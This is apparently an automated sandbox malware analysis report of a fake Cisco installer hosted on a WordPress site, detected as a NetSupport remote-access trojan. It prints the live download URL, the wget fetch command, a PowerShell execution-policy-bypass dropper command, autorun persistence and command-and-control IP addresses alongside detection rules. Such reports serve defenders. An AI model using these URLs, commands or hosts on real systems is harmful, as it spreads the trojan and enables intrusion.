Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe

Overview

General Information

Sample URL:https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
Analysis ID:1546280
Infos:

Detection

NetSupport RAT, NetSupport Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64native
  • cmd.exe (PID: 5808 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • wget.exe (PID: 4116 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • CiscoSetup.exe (PID: 3556 cmdline: "C:\Users\user\Desktop\download\CiscoSetup.exe" MD5: 91F7229586DF2C577A54AD0D1A5BDCB1)
    • CiscoSetup.tmp (PID: 5648 cmdline: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" MD5: BFD84005E52425F9B8FE658B9663E1C4)
      • powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • client32.exe (PID: 4288 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 4252 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\Cisco\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0000000D.00000000.69327908302.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000C.00000000.69246854158.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000B.00000002.70082150611.00000000027FC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 24 entries
                      SourceRuleDescriptionAuthorStrings
                      13.2.client32.exe.68cb0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        12.2.client32.exe.68cb0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          11.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            11.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              11.2.client32.exe.68cb0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries
                                SourceRuleDescriptionAuthorStrings
                                amsi32_3588.amsi.csvJoeSecurity_NetSupportDownloaderYara detected NetSupport DownloaderJoe Security
                                  amsi32_3588.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                  • 0x2e4f74:$b1: ::WriteAllBytes(
                                  • 0x2e4f3e:$b2: ::FromBase64String(
                                  • 0x2f16a0:$s1: -join
                                  • 0x2eae4c:$s4: +=
                                  • 0x2eaf0e:$s4: +=
                                  • 0x2ef135:$s4: +=
                                  • 0x2f1252:$s4: +=
                                  • 0x2f153c:$s4: +=
                                  • 0x2f1682:$s4: +=
                                  • 0x2f4e98:$s4: +=
                                  • 0x2f4f9c:$s4: +=
                                  • 0x2f83f8:$s4: +=
                                  • 0x2f8ad8:$s4: +=
                                  • 0x2f8f8e:$s4: +=
                                  • 0x2f8fe3:$s4: +=
                                  • 0x2f9257:$s4: +=
                                  • 0x2f9286:$s4: +=
                                  • 0x2f97ce:$s4: +=
                                  • 0x2f97fd:$s4: +=
                                  • 0x2f98dc:$s4: +=
                                  • 0x2fbb73:$s4: +=

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cisco\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6464, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1, ProcessId: 5808, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp, ParentProcessId: 5648, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1", ProcessId: 3588, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\NSM.LIC
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-31T18:05:21.486338+010020216971A Network Trojan was detected192.168.11.204975554.37.62.77443TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-10-31T18:05:13.649480+010028277451Malware Command and Control Activity Detected192.168.11.2049756151.236.16.15443TCP
                                  2024-10-31T18:05:13.649480+010028277451Malware Command and Control Activity Detected192.168.11.2049758199.188.200.195443TCP

                                  Click to jump to signature section

                                  Show All Signature Results
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,CryptGetProvParam,CryptGetProvParam,GetLastError,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,12_2_110AC820
                                  Source: is-4ES8I.tmp.6.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_467a8e15-5
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Source: unknownHTTPS traffic detected: 54.37.62.77:443 -> 192.168.11.20:49755 version: TLS 1.2
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000000B.00000002.70085959450.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000C.00000002.69251363793.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000D.00000002.69332147319.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69181004956.000000000A0AB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb% source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69174549429.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdb source: is-J44M9.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdbaa\GCTL source: is-J44M9.tmp.6.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-C05BP.tmp.6.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Downloader\Win32\Release\vpndownloader.pdb source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000C.00000002.69251018247.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000D.00000002.69331721534.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/include source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-C05BP.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 0000000B.00000002.70086113734.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000C.00000002.69251545748.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000D.00000002.69332386538.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: crypto\pem\pem_pkey.cRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYcompiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/includecrypto\asn1\x_info.ccrypto\pem\pem_info.ccrypto\ocsp\ocsp_lib.c source: is-4ES8I.tmp.6.dr
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,11_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,12_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,12_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,12_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,12_2_11107FE0
